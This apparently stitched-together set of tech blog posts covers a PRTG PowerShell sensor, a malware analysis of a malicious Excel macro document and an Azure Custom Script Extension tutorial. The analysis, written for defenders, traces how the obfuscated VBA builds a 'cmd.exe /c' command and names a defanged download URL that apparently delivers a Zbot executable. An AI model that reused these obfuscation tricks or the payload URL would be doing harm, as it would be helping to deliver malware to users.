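    return round(100 * free_bytes / size_bytes, 1)


def average_cpu_load(load_percentages):
    """One Win32_Processor instance per processor, each with a LoadPercentage value."""
    return round(sum(load_percentages) / len(load_percentages), 1)


# Made-up sample values standing in for the $OS, $Disks and $CPUs results
print(memory_used_percent(16_777_216, 4_194_304))          # 75.0
print(disk_free_percent(500_000_000_000, 125_000_000_000))  # 25.0
print(average_cpu_load([10, 30]))                           # 20.0
```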

SIDE NOTE: If your environment is not configured to use WinRM over HTTPS you should look at doing that. It allows you to use the -UseSsl parameter with ease and in many other cases where you want to ensure there is an extra layer of encryption protecting any information going over the wire.

You may have noticed above that the variable $Device is used in the -ComputerName parameter. If we were creating a PowerShell module, it would be best practice to use $ComputerName as the variable name. I used $Device because PRTG expects certain placeholder values to be set; if I renamed that variable to $ComputerName, the PRTG sensor would fail to connect to the remote host. When adding the custom sensor in PRTG, we need to enter the placeholder value in the following format.

'%device'

In the ps1 file, the $Device parameter is set and will be matched to the value of the device name. If you use Auto-Discovery in PRTG, you may need to rename some of the devices, because Auto-Discovery names them with an extra suffix such as [Windows SQL Server]. That entire name gets placed into the $Device variable, which means the sensor tries to contact a device that doesn't exist. An example of how this is entered can be seen below.

'Write EXE result to disk' is selected as this is great for troubleshooting any issues that may be happening with the sensor. The latest result is always logged on the PRTG server in the following directory. C:\ProgramData\Paessler\PRTG Network Monitor\Logs (Sensors). This is extremely handy when trying to format your XML labels with the correct names and values. If you set a value of Bytes to become Gigabytes you will still see the Bytes value in this log file. This is because PRTG converts these values in their web application and not the XML parser.

Mutex Name is a great option they added. When you have a script running on multiple remote devices, you want a limit on how many instances run at once; otherwise they might all run simultaneously. Sensors that share a Mutex Name, such as R5, run one after another rather than at the same time, and sensors with a different Mutex Name, such as DirkaDirka, form their own separate queue. This way you can control how many instances of the script run at once.

After creating the EXE/Advanced sensor you will need to place it in the C:\Program Files (x86)\PRTG Network Monitor\Custom Sensors\EXEXML directory. This way it will be available when you go to create the sensor and select it from a drop down menu inside the PRTG application. Once all is said and done my sensor will return results that look like the image below.

We are able to set the Warning and Alert values using the XML format defined by PRTG. The XML does need to be beautified in order for the sensor to work correctly. Below is the PowerShell function I used to beautify the output.

There are a few fields that are commented out that can easily be added to the PRTG final sensor by just copying them from the comments inside the $XML variable between tags. I left out the below fields but feel free to add them and add your own Error and Warning limits if desired. It is very fun.

Read the original blog post here: https://roberthosborne.com/f/prtg-sensor-condensing-with-powershell



Document Analysis – 2018-newsletters.xls

Today I received what was clearly a malicious document in my email, so to celebrate the publishing of my second PluralSight course - Performing Malware Analysis on Malicious Documents - I thought I'd go through the analysis of the document.

The document came in as an attachment in email and was named 2018-newsletters.xls.

MD5: 46fecfa6c32855c4fbf12d77b1dc761d
SHA1: c028bc46683617e7134aa9f3b7751117a38a177d
SHA256: 4e8449f84509f4d72b0b4baa4b8fd70571baaf9642f47523810ee933e972ebd9
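Before analysis, it is worth confirming that the file on disk is the same sample. Here is a minimal Python sketch that computes all three digests in one pass and compares them with the hashes above. The function names are illustrative:

```python
import hashlib
import sys

# IOC hashes published in this post for 2018-newsletters.xls
IOC = {
    "md5": "46fecfa6c32855c4fbf12d77b1dc761d",
    "sha1": "c028bc46683617e7134aa9f3b7751117a38a177d",
    "sha256": "4e8449f84509f4d72b0b4baa4b8fd70571baaf9642f47523810ee933e972ebd9",
}


def hash_chunks(chunks):
    """Feed an iterable of byte chunks into MD5, SHA1 and SHA256 at once."""
    digests = {name: hashlib.new(name) for name in IOC}
    for chunk in chunks:
        for d in digests.values():
            d.update(chunk)
    return {name: d.hexdigest() for name, d in digests.items()}


def file_hashes(path, chunk_size=65536):
    """Hash a file without loading it fully into memory."""
    with open(path, "rb") as fh:
        return hash_chunks(iter(lambda: fh.read(chunk_size), b""))


def matches_ioc(hashes, ioc=IOC):
    """True only if every listed algorithm matches (case-insensitive)."""
    return all(hashes.get(k, "").lower() == v.lower() for k, v in ioc.items())


if __name__ == "__main__":
    result = file_hashes(sys.argv[1])
    for name, value in result.items():
        print(f"{name.upper()}: {value}")
    print("Matches IOC:", matches_ioc(result))
```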

To analyze it, I'm going to use REMnux, the malware analysis Linux distribution put together by Lenny Zeltser. This distro has all the tools we need to analyze the document.

The first thing I need to do is figure out what type of Office document we're dealing with. Running the Linux file command on the document tells us that it uses Office's Composite Document File format, also known as the OLE2 or structured storage format. Knowing this helps us figure out which tools we can use on the file.
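The file command recognizes this format by its header. As a rough illustration, the following check is much simpler than file's magic database. A legacy OLE2 compound file starts with the 8-byte signature D0 CF 11 E0 A1 B1 1A E1. Newer OOXML documents are ZIP archives that start with the bytes 50 4B 03 04 ("PK"):

```python
import sys

OLE2_MAGIC = bytes.fromhex("d0cf11e0a1b11ae1")  # legacy .xls/.doc/.ppt
ZIP_MAGIC = b"PK\x03\x04"                        # OOXML files are ZIP archives


def office_container_type(header):
    """Classify a file by its first bytes: 'ole2', 'ooxml-zip' or 'unknown'."""
    if header.startswith(OLE2_MAGIC):
        return "ole2"
    if header.startswith(ZIP_MAGIC):
        return "ooxml-zip"
    return "unknown"


def sniff(path):
    """Read only the first 8 bytes of the file and classify them."""
    with open(path, "rb") as fh:
        return office_container_type(fh.read(8))


if __name__ == "__main__":
    print(sniff(sys.argv[1]))
```

The container type matters because macro extraction tools parse OLE2 and OOXML files differently.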

Next, I want to see if there's anything interesting inside of the document. There are lots of tools that can be used for this, but for now I'm just going to use Yara with the rules downloaded from the Yara Rules project.

Two YARA rules fire: Contains_VBA_macro_code and office_document_vba. Both rules indicate that the XLS contains VBA macro code. Attackers often use macros within documents to download additional malware or execute more code, such as PowerShell. If we didn't think this spreadsheet was malicious before, this certainly raises our suspicions.

Next, I'll try to extract the macro code. My favorite tool for this is olevba, which is part of oletools by decalage. When I run it, I use the --deobf and --decode options so that olevba attempts to deobfuscate and decode any strings it can.

The resulting output is an excellent example of the lengths attackers will go to in order to hide what they are doing from analysts. Let's look at a few of the functions and the obfuscation they perform.

In the example to the right, the first function that is executed by the XLS is Workbook_Open(). This function calls the VBA Shell() function; Shell() is used to execute operating system commands. The parameters to the Shell() function are other functions, which lead to other functions, which lead to obfuscated strings.

We can manually trace through the code to figure out what this is doing.

The first parameter to Shell() is a function call to a function named tabretable().

tabretable() calls 3 different functions, one of them being sunafeelo().

sunafeelo() has 4 lines in it.

The first line sets a variable to the string "external hard".

The second line sets a variable to the string "cM" using the Chr() function. Chr() returns the character that corresponds to the character code given to it. Attackers often use this technique to obfuscate strings.

The third line creates the string "D.ex" by combining Chr(), a period, and the results from the Left() function. In this case, the Left() function returns the first 2 letters from the left side of the string "external hard", or "ex".

The last line combines all of these together, along with the results from the Right() function. Here, Right() returns the right-most two characters from the string "free ", which are "e " (e plus a space).

The result from the first parameter to Shell() is "cMD.exe /c ", so we know it's building a command to execute on the system. I could go through the rest of the code to figure it out, but why should I when there are tools that will do it for me?
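The manual trace of sunafeelo() can be replayed outside of Office. The following Python sketch mimics VBA's Left() and Right() with string slicing. The variable names are hypothetical. The exact Chr() codes are also an assumption (99 and 77 for "cM", 68 for "D"), because the post only shows the resulting strings. Windows treats file names case-insensitively, which is why "cMD.exe" still launches cmd.exe.

```python
def vba_left(s, n):
    """Python equivalent of VBA Left(s, n): the first n characters."""
    return s[:n]


def vba_right(s, n):
    """Python equivalent of VBA Right(s, n): the last n characters."""
    return s[-n:] if n > 0 else ""  # s[-0:] would return the whole string


def sunafeelo():
    """Replay of the four traced lines (Chr() codes assumed)."""
    part1 = "external hard"                      # line 1
    part2 = chr(99) + chr(77)                    # line 2: "cM"
    part3 = chr(68) + "." + vba_left(part1, 2)   # line 3: "D.ex"
    return part2 + part3 + vba_right("free ", 2) # line 4: "cM" + "D.ex" + "e "


if __name__ == "__main__":
    print(repr(sunafeelo()))  # 'cMD.exe '
```

The "/c " that completes "cMD.exe /c " comes from the other functions that tabretable() calls, which are not reproduced here.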

To do this, I'll use Lazy Office Analyzer (LOA). LOA works by setting breakpoints on various APIs and recording their parameters. This lets us watch when the malicious document writes files, connects to URLs, and, most importantly, executes commands.

In the image above, you can see how I ran LOA. In the end, the document executes obfuscated PowerShell that we could deobfuscate further. However, we see the URL hxxps://softarez[.]cf/mkeyb[.]gif in the code, from which we can infer that it downloads and executes whatever is returned.

This site was not up when I analyzed it, but fortunately someone had analyzed it on Hybrid Analysis. That analysis shows that the downloaded file is a Windows executable, which VirusTotal identifies as a Zbot variant.

However, with regard to analyzing the malicious Excel file, we're done. Documents are typically used as the first stage of a malware compromise - in other words, they download or drop more malware to execute - so we've figured out what it does: the malicious document downloads an executable and runs it.

From here, we can start looking on our network for anyone accessing this site, as they will most likely have opened this document.
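One way to start that search is to refang the URL IOC and look for its host name in proxy or DNS logs. The sketch below is hypothetical. The log lines are invented, and a simple regular expression stands in for whatever search your log platform provides:

```python
import re
from urllib.parse import urlsplit

DEFANGED_URL = "hxxps://softarez[.]cf/mkeyb[.]gif"  # IOC from this post


def refang(indicator):
    """Undo common defanging: hxxp(s) -> http(s) and [.] -> ."""
    indicator = re.sub(r"^hxxp", "http", indicator, flags=re.IGNORECASE)
    return indicator.replace("[.]", ".")


def matching_lines(lines, indicator=DEFANGED_URL):
    """Return the log lines that mention the IOC host or any of its subdomains."""
    host = urlsplit(refang(indicator)).hostname  # "softarez.cf"
    # The host must not be glued to other name characters (skips "notsoftarez.cf").
    pattern = re.compile(r"(?<![\w-])" + re.escape(host) + r"(?![\w-])", re.IGNORECASE)
    return [line for line in lines if pattern.search(line)]


if __name__ == "__main__":
    sample_log = [  # invented proxy log lines
        "10.0.0.5 GET https://softarez.cf/mkeyb.gif 404",
        "10.0.0.6 GET https://example.com/index.html 200",
        "10.0.0.7 CONNECT www.softarez.cf:443",
    ]
    for line in matching_lines(sample_log):
        print(line)
```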

As I stated in the beginning of this post, my second PluralSight course was published and teaches how to analyze malicious documents. If you want to learn how to do everything I discussed here, plus a lot more, go check out the course. I welcome any feedback on it - good or bad - and any new courses you'd like to see from me.

IOCs

2018-newsletters.xls

MD5: 46fecfa6c32855c4fbf12d77b1dc761d
SHA1: c028bc46683617e7134aa9f3b7751117a38a177d
SHA256: 4e8449f84509f4d72b0b4baa4b8fd70571baaf9642f47523810ee933e972ebd9

URLs

hxxps://softarez[.]cf/mkeyb[.]gif

The post Document Analysis – 2018-newsletters.xls appeared first on Security Boulevard.




Using Azure Custom Script Extension to execute scripts on Azure VMs

With the Azure Custom Script Extension, you can download and execute scripts on Azure virtual machines. This extension is useful for post-deployment configuration, software installation, or any other configuration or management task. Scripts can be downloaded from Azure Storage or GitHub, or provided to the Azure portal at extension run time.

In this blog post I'm going to explain how you can use the Azure Custom Script Extension to execute a PowerShell script multiple times on an Azure Windows VM from an Azure Automation Runbook.

Why use the Azure Custom Script Extension?

There are multiple ways to execute a PowerShell script on a Windows Virtual machine in Azure.

PowerShell Remoting

Desired State Configuration script resource

Custom Script Extension

Let's go through each of them.

Ad 1. PowerShell Remoting

The advantages are:

PowerShell Remoting does not need an extra agent or extension installation on VM

With PowerShell Remoting, you can run a script against multiple VMs at the same time.

PowerShell Remoting also allows an interactive session (not really a use-case for calling a script from an Azure Automation Runbook)

Proven technology: PowerShell Remoting has been available since PowerShell 2.0.

PowerShell Remoting can be used for running PowerShell scripts and Workflows.

The disadvantages are:

The PowerShell Remoting (WinRM) endpoint is not configured by default for ARM virtual machines. Extra configuration steps are needed:

WinRM listener on VM needs to be configured.

Firewall port for incoming traffic needs to be opened.

Network Security Group Rule to allow inbound requests needs to be added.

VM needs to have a Public IP Address to remote into the VM.

A credential with permissions on the Azure VM is needed before you can remote into it.

Ad 2. Desired State Configuration script resource

The advantages are:

DSC agent is built into Windows (there is no agent to install).

DSC agent uses the ‘pull’ model (no ports need to be opened on the Azure VM)

DSC script resource can be rerun at regular intervals by DSC agent.

Success/fail can be monitored via the Azure portal or Azure PowerShell.

The disadvantages are:

DSC script resource only supports native PowerShell scripts. (PowerShell workflow and graphical runbooks cannot be used with DSC)

DSC does not return output streams in the way a Runbook would. (DSC reports success/fail with few (if any) script execution details to Azure).

Ad 3. Custom Script Extension

The advantages are:

No local or domain credential is needed to log in to the Azure VM.

The VM does not need a public IP address for remote access, unlike with PowerShell Remoting.

Simple to implement, not many pre-requisites needed.

The disadvantages are:

The Custom Script Extension needs to be enabled for each VM you want to run your (PowerShell) script on.

The VM needs internet access to reach the script location (Azure Storage or GitHub).

Relatively slow (some PowerShell cmdlets, such as Set-AzureRmVMCustomScriptExtension, may block the call until the script finishes).

Because the Custom Script Extension was the easiest and fastest way to get a PowerShell script running on an Azure VM, I chose this option.

In this blog post I'm going to describe how to use the Custom Script Extension for the following scenario.

Scenario:

Trigger Windows Update using the PSWindowsUpdate PowerShell Module from Azure Automation on a Windows Virtual Machine in Azure.

The following high-level steps need to be executed to implement above scenario:

Install PSWindowsUpdate PowerShell Module on the Azure Windows VM.

Create a PowerShell script (Install-WindowsUpdate.ps1) that uses Get-WUInstall from the PSWindowsUpdate PowerShell Module to get the list of available updates, then download and install them.

Store Install-WindowsUpdate.ps1 in Azure Blob Storage Container.

Create an Azure Runbook that updates the Custom Script Extension on a scheduled interval.

Step 1. Install PSWindowsUpdate PowerShell Module on the Azure Windows VM

Connect to Azure Windows VM and install the PSWindowsUpdate Module using the following PowerShell code from an elevated PowerShell prompt:

Install-Module -name PSWindowsUpdate -Scope AllUsers

Remark:

You can also have the Custom Script Extension (PowerShell) script download and install the PSWindowsUpdate PowerShell Module.

Step 2. Create PowerShell script (Install-WindowsUpdate.ps1)

We want to install all Windows Updates which can be achieved with the following command from the PSWindowsUpdate module.

Get-WUInstall -WindowsUpdate -AcceptAll -AutoReboot -Confirm:$FALSE

This command gets the list of available updates, using Windows Update as the source (-WindowsUpdate), then downloads and installs them. -AcceptAll installs all available updates without asking for confirmation of each update. -AutoReboot reboots automatically if a reboot is needed instead of asking. -Confirm:$FALSE suppresses the confirmation prompt.

Store the Install-WindowsUpdate.ps1 script on your local machine (example: c:\temp\Install-WindowsUpdate.ps1) before uploading the script to the Storage Container.

Step 3. Store Install-WindowsUpdate.ps1 in Azure Blob storage

We first need to create an Azure Blob Storage Container to store the Install-WindowsUpdate.ps1 script.

Use the following script to create a new Storage Account with a Blob Container.

#region variables
$Location = 'westeurope'
$ResourceGroupName = 'scriptextensiondemo-rg'
$StorageAccountName = 'scriptextensiondemosa'
$ContainerName = 'script'
$FileName = 'Install-WindowsUpdate.ps1'
$ScriptToUpload = 'c:\temp\{0}' -f $FileName
$Tag = @{'Environment'='Demo'}
#endregion
#region Connect to Azure
#Login to Azure
Add-AzureRmAccount
#Select Azure Subscription
$subscription = (Get-AzureRmSubscription | Out-GridView `
    -Title 'Select an Azure Subscription ...' `
    -PassThru)
Set-AzureRmContext -SubscriptionId $subscription.Id -TenantId $subscription.TenantID
Select-AzureRmSubscription -SubscriptionName $($subscription.Name)
#endregion
#region Create new Resource Group
New-AzureRmResourceGroup -Name $ResourceGroupName -Location $Location -Tag $Tag
#endregion
#region Create a new storage account.
New-AzureRmStorageAccount -Name $StorageAccountName -ResourceGroupName $ResourceGroupName -SkuName Standard_LRS -Location $Location -Kind BlobStorage -AccessTier Cool -Tag $Tag
#endregion
#region Create a Script Container
Set-AzureRmCurrentStorageAccount -Name $StorageAccountName -ResourceGroupName $ResourceGroupName
New-AzureStorageContainer -Name $ContainerName -Permission Blob
#endregion
#region upload script extension script to container
Set-AzureStorageBlobContent -Container $ContainerName -File $ScriptToUpload
#endregion

Step 4. Create an Azure Runbook that updates the Custom Script Extension on a scheduled interval

The final step in this scenario is to create an Azure Runbook which updates the Custom Script Extension.

To update (re-run) an already configured Custom Script Extension we need to use the ForceRerun parameter of the Set-AzureRmVMCustomScriptExtension cmdlet.

Example:

#region rerun script extension
Set-AzureRmVMCustomScriptExtension -ResourceGroupName $ResourceGroupName `
    -VMName $VMName `
    -StorageAccountName $StorageAccountName `
    -ContainerName $ContainerName `
    -FileName $FileName `
    -Run $FileName `
    -Name $ScriptExtensionName `
    -Location $Location `
    -ForceRerun $(New-Guid).Guid
#endregion
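For reference, the ARM representation of this extension can be sketched in Python. This illustration rests on several assumptions and is not the runbook itself. It assumes that the -ForceRerun value ends up in the extension's forceUpdateTag property, where a changed value triggers a re-run. It also assumes that the script is served from a public blob URL, because the container was created with -Permission Blob, and that typeHandlerVersion 1.10 is acceptable for your VMs. `blob_uri` and `custom_script_extension_body` are hypothetical helpers:

```python
import json
import uuid


def blob_uri(storage_account, container, file_name):
    """Public URL of a blob in a container created with -Permission Blob."""
    return f"https://{storage_account}.blob.core.windows.net/{container}/{file_name}"


def custom_script_extension_body(location, storage_account, container, file_name,
                                 force_update_tag=None):
    """Sketch of an ARM body for the Windows Custom Script Extension.

    A fresh force_update_tag (a new GUID by default) is assumed to be what
    makes Azure run the extension again even though its settings are unchanged.
    """
    return {
        "location": location,
        "properties": {
            "publisher": "Microsoft.Compute",
            "type": "CustomScriptExtension",
            "typeHandlerVersion": "1.10",
            "autoUpgradeMinorVersion": True,
            "forceUpdateTag": force_update_tag or str(uuid.uuid4()),
            "settings": {
                "fileUris": [blob_uri(storage_account, container, file_name)],
                "commandToExecute": f"powershell -ExecutionPolicy Unrestricted -File {file_name}",
            },
        },
    }


if __name__ == "__main__":
    body = custom_script_extension_body(
        "westeurope", "scriptextensiondemosa", "script", "Install-WindowsUpdate.ps1")
    print(json.dumps(body, indent=2))
```

Calling the function twice yields two different forceUpdateTag values. This mirrors passing a new GUID to -ForceRerun on every scheduled runbook run.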